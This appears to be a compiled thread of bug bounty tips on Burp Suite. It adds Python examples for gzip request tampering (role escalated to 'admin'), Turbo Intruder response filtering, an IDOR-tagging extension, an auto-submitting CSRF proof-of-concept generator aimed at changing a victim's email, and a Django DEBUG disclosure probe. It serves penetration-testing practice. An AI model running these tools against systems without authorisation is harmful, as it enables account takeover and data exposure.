#BurpHacksForBounties - Day 1/30
Turbo Intruder: the power of Python with Burp Suite Intruder.
I use it to tailor my pen-testing for a specific target and targeted #bugbounty
#infosec #appsec #bugbountytips #bugbountytip #security
How to - 🧵🙃👇
♥️ #BurpHacksForBounties - Day 3/30 ♥️
🔍🔎
Find References: the most underrated and underused feature of Burp Suite.
Pro only; it finds every place a URI is referenced across all of Burp's tools.
A short thread : 🧵👇
#infosec #appsec #security #burp #bugbountytip #bugbountytips
🍺🤡 #BurpHacksForBounties - Day 4/30
Don't ignore junk-looking information in Burp Suite.
Keep this setting on (the Proxy option to unpack gzip / deflate in requests and responses) and play with zipped data in Burp Suite.
🤫🤫 You can change zipped data in the request.
Learned from @stokfredrik
#infosec #appsec #security #burp #bugbountytips #bugbountytip
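What the unpack setting hides is shown below by hand: decompress the gzip body, change a field, recompress, and fix Content-Length so the server still parses the request. This is an added example, not code from the post; the request it builds is constructed, and target.example is a placeholder host.

```python
"""
Edit a gzip-compressed request body by hand. This is what Burp does for you
when "Unpack gzip / deflate in requests" is on; doing it manually shows why
Content-Length must change along with the body. Added example, not from the
post; the request below is constructed.
"""
import gzip
import json

def build_request(data):
    """Constructed sample: a JSON body sent gzip-compressed to a placeholder host."""
    body = gzip.compress(json.dumps(data).encode())
    head = (b"POST /api/profile HTTP/1.1\r\n"
            b"Host: target.example\r\n"
            b"Content-Type: application/json\r\n"
            b"Content-Encoding: gzip\r\n"
            b"Content-Length: %d" % len(body))
    return head + b"\r\n\r\n" + body

def unpack_body(raw_request):
    """Split a raw request into (header bytes, decoded JSON body)."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    if b"content-encoding: gzip" not in head.lower():
        raise ValueError("body is not gzip-compressed")
    return head, json.loads(gzip.decompress(body))

def repack(head, data):
    """Re-compress an edited body and rewrite Content-Length to the new byte count."""
    new_body = gzip.compress(json.dumps(data).encode())
    lines = [line for line in head.split(b"\r\n")
             if not line.lower().startswith(b"content-length:")]
    lines.append(b"Content-Length: %d" % len(new_body))
    return b"\r\n".join(lines) + b"\r\n\r\n" + new_body

def tamper(raw_request, **changes):
    """Decode, change top-level JSON fields, re-encode: the 'junk' was data all along."""
    head, data = unpack_body(raw_request)
    data.update(changes)
    return repack(head, data)

if __name__ == "__main__":
    original = build_request({"user": "alice", "role": "user"})
    modified = tamper(original, role="admin")
    print(unpack_body(modified)[1])
```

The same idea applies to deflate bodies with `zlib` instead of `gzip`; the part people forget is the Content-Length, which is why a hand-edited compressed body so often produces a 400.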
Got an S3 bucket but don't know who the owner is?
Use the below command to check the bucket owner (your credentials need s3:GetBucketAcl on the bucket, otherwise you get AccessDenied):
aws s3api get-bucket-acl --bucket bucket-name
#bugbountytip #bugbountytips #infosec #AWS
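The command's JSON output answers more than "who owns it": the Grants list also tells you whether the bucket is readable or writable by everyone. The script below wraps the same CLI call and summarizes the ACL. It is an added example, not from the post; SAMPLE_ACL is a constructed response shaped like the CLI output, and "example-owner" is a placeholder.

```python
"""
Summarize `aws s3api get-bucket-acl` output: owner plus any grants to the
AllUsers / AuthenticatedUsers groups. Added example, not from the post.
SAMPLE_ACL is constructed to look like the CLI's JSON; it is not a real bucket.
"""
import json
import subprocess

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"

OWNER_ID = "a1b2c3" + "d" * 58   # constructed canonical user id
SAMPLE_ACL = json.dumps({
    "Owner": {"DisplayName": "example-owner", "ID": OWNER_ID},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "DisplayName": "example-owner", "ID": OWNER_ID},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ_ACP"},
    ],
})

def summarize_acl(acl_json):
    """Return (owner display name, owner canonical id, {group: set(permissions)})."""
    acl = json.loads(acl_json)
    owner = acl.get("Owner", {})
    public = {"AllUsers": set(), "AuthenticatedUsers": set()}
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        if grantee.get("URI") == ALL_USERS:
            public["AllUsers"].add(grant["Permission"])
        elif grantee.get("URI") == AUTH_USERS:
            public["AuthenticatedUsers"].add(grant["Permission"])
    # DisplayName is not returned in every region; the canonical ID always is.
    return owner.get("DisplayName"), owner.get("ID"), public

def fetch_acl(bucket):
    """Run the CLI from the post. Needs s3:GetBucketAcl (READ_ACP) on the bucket;
    AccessDenied or a missing bucket surfaces as CalledProcessError."""
    out = subprocess.run(["aws", "s3api", "get-bucket-acl", "--bucket", bucket],
                         capture_output=True, text=True, check=True)
    return out.stdout

def report(acl_json):
    """Human-readable lines: owner first, then any group grants, then a write warning."""
    name, ident, public = summarize_acl(acl_json)
    lines = ["owner: %s (%s)" % (name, ident)]
    for group, perms in public.items():
        if perms:
            lines.append("%s: %s" % (group, ", ".join(sorted(perms))))
    if "WRITE" in public["AllUsers"]:
        lines.append("WARNING: anonymous WRITE granted, bucket is world-writable")
    return lines

if __name__ == "__main__":
    import sys
    acl = fetch_acl(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_ACL
    print("\n".join(report(acl)))
```

Run it with a bucket name to query a real bucket, or without arguments to see the summary of the constructed sample. Note that ACLs are only one of several access controls; a bucket policy or Block Public Access can override what the grants suggest.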
🚨🚨🤓 #BurpHacksForBounties - Day 9/30
Follow a parameter in Burp Suite Repeater's response.
A time-saver tip that I read from @sw33tLie reply in the thread by @codingo_
👇🔽⬇️
#security #appsec #burp #bugbountytips #bugbountytip
#BurpHacksForBounties - Day 12/30
iptables + Burp Suite + Android applications. 😍🤓🤫😀
Tricky and lengthy, but worth setting up.
#burp #bugbountytips #infosec #security #appsec #bugbountytip
#BurpHacksForBounties - Tip 14/30
Burp Suite config lets you manage options at user level and at project level.
I personally use this configuration:
#appsec #infosec #burp #bugbountytips #bugbountytip
#BurpHacksForBounties - Day 18/30
Do you want to filter the responses in Burp Suite Intruder and only show the ones that have a specific pattern in the response?
If yes try this 👇🏻 🧵
#appsec #infosec #bugbountytips #bugbountytip #burp
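The Day 1 tip (Turbo Intruder) and the Day 18 tip (showing only responses that match a pattern) meet in one script: Turbo Intruder lets you write the filter in Python instead of configuring Intruder's grep options. The script below is an added example, not the post's own code. `queueRequests`, `handleResponse`, `RequestEngine`, `target.endpoint`, `target.req` and `table` are provided by Turbo Intruder when the script is loaded inside Burp and do not exist outside it; the token pattern and the three-word wordlist are my assumptions.

```python
"""
Turbo Intruder script with a Python-side response filter.

Added example, not from the post. The entry points queueRequests/handleResponse
and the names RequestEngine, target and table are supplied by Turbo Intruder at
load time (they are undefined outside Burp). is_interesting() is plain Python
and can be run and tested on its own.
"""
import re

# Assumed pattern: keep responses that leak a session-like token.
INTERESTING = re.compile(r'"token"\s*:\s*"[A-Za-z0-9._-]{16,}"')
# Status codes treated as noise before the pattern is consulted.
NOISE_STATUS = {404, 429}

def is_interesting(status, body, pattern=INTERESTING):
    """Return True for a response worth keeping in the results table."""
    if status in NOISE_STATUS:
        return False
    if status >= 500:
        # server errors are always worth a look, pattern or not
        return True
    return pattern.search(body) is not None

# Constructed wordlist used instead of a file (assumption).
DEFAULT_WORDS = ["admin", "test", "guest"]

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False)
    for word in DEFAULT_WORDS:
        # the %s marker placed in the request in Burp is replaced by each word
        engine.queue(target.req, word)

def handleResponse(req, interesting):
    # Turbo Intruder's own `interesting` flag comes from its built-in filter;
    # the stricter Python check below decides what reaches the table.
    if is_interesting(req.status, req.response):
        table.add(req)
```

Inside Burp: send a request to Turbo Intruder, mark the injection point with `%s`, paste this script and attack; only rows passing `is_interesting` appear. The same result in classic Intruder is the "Grep - Match" option plus a filter on the results table.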
#BurpHacksForBounties - Day 22/30
🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java.
Thank you Burp Suite for making it easy
#infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security
#BurpHacksForBounties - Day 24/30
This is an amazing write-up on using a Burp plugin that eases the journey of catching IDORs.
Writeup link: https://infosecwriteups.com/leveraging-burp-suite-extension-for-finding-idor-insecure-direct-object-reference-2653f9b89fd4
By @dhanush
#infosec #appsec #bugbountytips #bugbountytip #bugbounty #security
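Day 22 shows that an extension is little code, and Day 24 shows why you would write one for IDORs. The extension below is an added example in Burp's Python (Jython) flavour, not the Java plugin from the tweets and not the code from the linked write-up. It tags proxied requests whose path or query carries a numeric object ID. `IBurpExtender`, `IHttpListener`, `registerHttpListener`, `analyzeRequest`, `setHighlight` and `setComment` are Burp's Extender API; the ID-spotting regexes and the parameter names they look for are my assumptions.

```python
# -*- coding: utf-8 -*-
"""
Burp extension (Python/Jython) that highlights requests carrying numeric
object IDs as IDOR candidates. Added example; not the page's Java plugin nor
the linked write-up's code. Burp API names are real; the ID heuristics are
assumptions. Load via Extender > Extensions > Add, extension type Python.
"""
import re

try:
    from burp import IBurpExtender, IHttpListener
except ImportError:
    # Outside Burp (e.g. running the tests) fall back to empty base classes
    # so find_ids() can be exercised without Jython.
    class IBurpExtender(object):
        pass
    class IHttpListener(object):
        pass

# Path segments like /users/1234/ or /orders/98 (assumed shape)
PATH_ID = re.compile(r'/(?:[a-z_-]+)/(\d{1,12})(?=/|$|\?)', re.I)
# Query parameters whose name hints at an object reference (assumed names)
PARAM_ID = re.compile(
    r'(?:^|[?&])((?:user|account|order|doc|file|invoice)?_?id)=(\d{1,12})', re.I)

def find_ids(url):
    """Return [(where, name, value)] for numeric IDs found in a URL string."""
    hits = []
    path, _, query = url.partition('?')
    for m in PATH_ID.finditer(path):
        # the segment just before the number names the object type
        name = path[:m.start(1)].rstrip('/').rsplit('/', 1)[-1]
        hits.append(('path', name, m.group(1)))
    for m in PARAM_ID.finditer('?' + query if query else ''):
        hits.append(('query', m.group(1), m.group(2)))
    return hits

class BurpExtender(IBurpExtender, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("IDOR candidate tagger (example)")
        callbacks.registerHttpListener(self)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        if not messageIsRequest:
            return
        url = str(self._helpers.analyzeRequest(messageInfo).getUrl())
        hits = find_ids(url)
        if hits:
            # highlight and comment show up in the Proxy history table
            messageInfo.setHighlight("yellow")
            messageInfo.setComment("IDOR? " + ", ".join(
                "%s %s=%s" % hit for hit in hits))
```

The tagging is only the first step: for each highlighted row, replay the request in Repeater with another account's session and a neighbouring ID, and compare the responses.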
#BurpHacksForBounties - Day 28/30 - Super CSRF POC Generator Hack.
The CSRF PoC generator is only available in Burp Suite Pro, but not anymore:
Use this -> https://github.com/merttasci/csrf-poc-generator by @mertistaken
#infosec #burp #appsec #security #bugbountytips #bugbountytip #cybersecurity
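What such a generator does is mechanical: parse the captured request, turn each parameter into a hidden input, and auto-submit the form from a page the victim visits. The script below is an added example of that, not the code of the linked csrf-poc-generator. RAW_REQUEST is a constructed sample, target.example is a placeholder host, and the https scheme is assumed because a raw request does not carry one.

```python
"""
Generate a CSRF proof-of-concept page from a captured request, the job the
Pro-only "Generate CSRF PoC" feature does. Added example; not the linked
tool's code. RAW_REQUEST is constructed; the scheme is assumed to be https.
"""
import re
from html import escape
from urllib.parse import parse_qsl

RAW_REQUEST = (
    "POST /account/email HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc\r\n"
    "Content-Length: 36\r\n"
    "\r\n"
    "email=attacker%40evil.example&save=1"
)
# Parameter names that usually carry an anti-CSRF token (assumed list).
TOKEN_NAME = re.compile(r"csrf|token|nonce|authenticity", re.I)

def parse_request(raw):
    """Return (METHOD, absolute url, [(name, value), ...]) from a raw request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    method = method.upper()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = "https://%s%s" % (headers["host"], path)   # scheme is an assumption
    if method == "GET":
        url, _, query = url.partition("?")
        params = parse_qsl(query, keep_blank_values=True)
    else:
        ctype = headers.get("content-type", "")
        if "application/x-www-form-urlencoded" not in ctype:
            # a plain <form> cannot send JSON or other non-form bodies
            raise ValueError("cannot replay %r with an HTML form" % ctype)
        params = parse_qsl(body, keep_blank_values=True)
    return method, url, params

def suspected_tokens(params):
    """Names that look like anti-CSRF tokens; if present the PoC will likely fail."""
    return [name for name, _ in params if TOKEN_NAME.search(name)]

def csrf_poc(raw, auto_submit=True):
    """Build the HTML page: one hidden input per parameter, submitted on load."""
    method, url, params = parse_request(raw)
    warn = ""
    tokens = suspected_tokens(params)
    if tokens:
        warn = ("<!-- anti-CSRF token(s) present: %s; "
                "the request is probably not exploitable -->\n" % ", ".join(tokens))
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s">'
        % (escape(n, quote=True), escape(v, quote=True)) for n, v in params)
    submit = ("  <script>document.forms[0].submit();</script>" if auto_submit
              else '  <input type="submit" value="Submit request">')
    return warn + (
        "<html>\n<body>\n"
        '  <form action="%s" method="%s">\n%s\n  </form>\n%s\n'
        "</body>\n</html>\n" % (escape(url, quote=True), method, inputs, submit))

if __name__ == "__main__":
    print(csrf_poc(RAW_REQUEST))
```

Host the output on a domain you control and open it in a browser logged in to the target. If the session cookie is SameSite=Lax or Strict (the browser default is Lax), the cross-site POST will arrive without it and the PoC will fail even when no token is present, so check the Set-Cookie attributes before you report.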
#BurpHacksForBounties - Day 29/30
No Collaborator? No worries.
Burp Suite Collaborator is part of Pro, so use requestbin.net
- Same out-of-band idea as Collaborator: a listener that records callbacks for you
- Free 20 requests without login
- HTTP bin
- DNS bin
#infosec #appsec #bugbountytips #bugbountytip #burp
Django Debug Mode Bypass
https://target/login?next=/
https://target/admin
[301 to https://target/admin/login/?next=/admin/]
Change request to [POST]
[500: Django DEBUG mode is on, and very bad information disclosure]
#bugbounty #bugbountytips #bugbountytip
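The sequence above as a script: request /admin, take the redirect target, re-send it as POST, and decide whether the 500 is Django's technical debug page rather than a plain server error. This is an added example, not from the post. `probe()` takes a `send()` callable so the logic runs offline against `canned_send()`, whose responses are constructed to mirror the post; `urllib_send()` talks to a real host. The marker strings are the ones Django's technical 500 page contains when DEBUG is True.

```python
"""
Reproduce the post's steps: GET /admin, follow the 301 target, re-send as
POST, and check whether the 500 is Django's DEBUG page. Added example, not
from the post. canned_send() returns constructed responses; urllib_send()
performs real requests.
"""
import urllib.error
import urllib.request

# Strings found on Django's technical 500 page (shown only when DEBUG = True).
DEBUG_MARKERS = ("DEBUG = True", "Django Version", "Traceback")

def looks_like_django_debug(status, body):
    """A 500 carrying at least two markers is the debug page: settings, SQL and paths leak."""
    if status != 500:
        return False
    return sum(marker in body for marker in DEBUG_MARKERS) >= 2

def probe(base_url, send):
    """send(method, url) -> (status, lowercase-header dict, body text)."""
    target = base_url + "/admin"
    status, headers, _ = send("GET", target)
    if status in (301, 302) and headers.get("location"):
        location = headers["location"]
        target = location if location.startswith("http") else base_url + location
    status, _, body = send("POST", target)   # the method switch from the post
    return {"url": target, "status": status,
            "debug": looks_like_django_debug(status, body)}

def canned_send(method, url):
    """Constructed responses mirroring the post's sequence (not a real target)."""
    if method == "GET" and url.endswith("/admin"):
        return 301, {"location": "/admin/login/?next=/admin/"}, ""
    if method == "POST" and url.endswith("/admin/login/?next=/admin/"):
        return 500, {}, ("<h1>ValueError at /admin/login/</h1>"
                         "<th>Django Version:</th><td>3.2</td>"
                         "<h2>Traceback</h2> ... DEBUG = True in your settings file.")
    return 200, {}, "ok"

def urllib_send(method, url):
    """Live sender that refuses to follow redirects, so probe() sees the 301 itself."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None
    opener = urllib.request.build_opener(NoRedirect)
    request = urllib.request.Request(url, method=method,
                                     data=b"" if method == "POST" else None)
    try:
        with opener.open(request, timeout=10) as resp:
            return (resp.getcode(), {k.lower(): v for k, v in resp.headers.items()},
                    resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return (err.code, {k.lower(): v for k, v in err.headers.items()},
                err.read().decode("utf-8", "replace"))

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1].rstrip("/"), urllib_send))
    else:
        print(probe("https://target", canned_send))
```

Run with a base URL to test a live host, or without arguments to see the canned walk-through. A 500 without the markers is just an error; the finding is the debug page itself, which exposes settings, local variables and SQL in the traceback.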